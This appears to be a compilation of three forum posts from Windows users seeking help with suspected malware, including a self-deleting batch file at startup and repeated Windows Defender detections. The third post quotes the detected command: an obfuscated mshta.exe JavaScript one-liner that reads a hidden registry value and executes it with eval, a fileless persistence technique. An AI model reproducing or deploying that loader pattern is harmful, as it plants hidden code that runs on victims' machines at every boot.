Potential Malware: Need help dealing with it

I don't have a screenshot handy right now.

I am dealing with a weird potentially malware which keep asking the user for permission to run at every bootup. I always click no because it looks fishy for several reasons.

One) The file/program name is simply "execute.bat" and the certification of the program is equally confusing. By confusing I meant one part certification goes back to 2011 and another say 2020 etc... I can't find any legit program on my startup list that would run like this to best of my knowledge.

Two) Every time I click no, I navigate to the folder location only to find nothing there. The folder path also change widely every time I boot up. "\Temp\blah blah blah\execute.bat": Blah blah blah will be a random long string which may be normal for a temp folder but why would it delete itself after clicking no?

Three)It is asking to run through System32/cmd/ and the PC hasn't even finish booting up at all. Which give it a huge security risk since both of my Window and Third-party firewall isn't running at this point.

I would appreciate any help with how to deal with this.

  3. Potential Malware?

Hello - While updating my Mozilla browser yesterday the below link appeared and downloaded to my PC and the C prompt appeared with a progress monitor that went right to 100% then closed. Since then when I run the Microsoft Malware and Anti Virus protection
a message now appears that my PC might have have malware or a potential virus but non are ever identified upon the scan completing. It does appear the scan (Both quick and full) are taking longer than prior to this download. Below is the link that appears
in my download history. Any suggestions? Just trying to prevent my nice laptop from being ruined.

    Potential malware notice.

Whenever I start up my computer, I keep receiving a notification that Windows Defender has stopped and deleted a potential threat of malware (Powessere H) on my system. The details of the notification are:

    CMDLine: \Device\HarddiskVolume3\Windows\System32\mshta.exe

    "C"\WINDOWS\system32\mshta.exe" "javascript:HrKMx5aM="A";V4K=new

    ActiveXObject("WScript.Shell"); HH1uWE="e7Y";U9epk3=V4K.RegRead("HKCU\\software\\g

    kmprh\\reggfbqsre");DiZNFD64J="QwiXg";eval(U9epk3);opE9Db="7PeVNdi";"

I have run various malware programs trying to get rid of this, but it continues to be blocked every time I start or restart up my desktop unit. I am making the assumption that this needs to be permanently removed, is that correct?

I am at a loss and do not know what to do next. Do I reinstall Windows 10? If I do, will have to reinstall all of my software and my files?

I would greatly appreciate any suggestions/help you can give me.
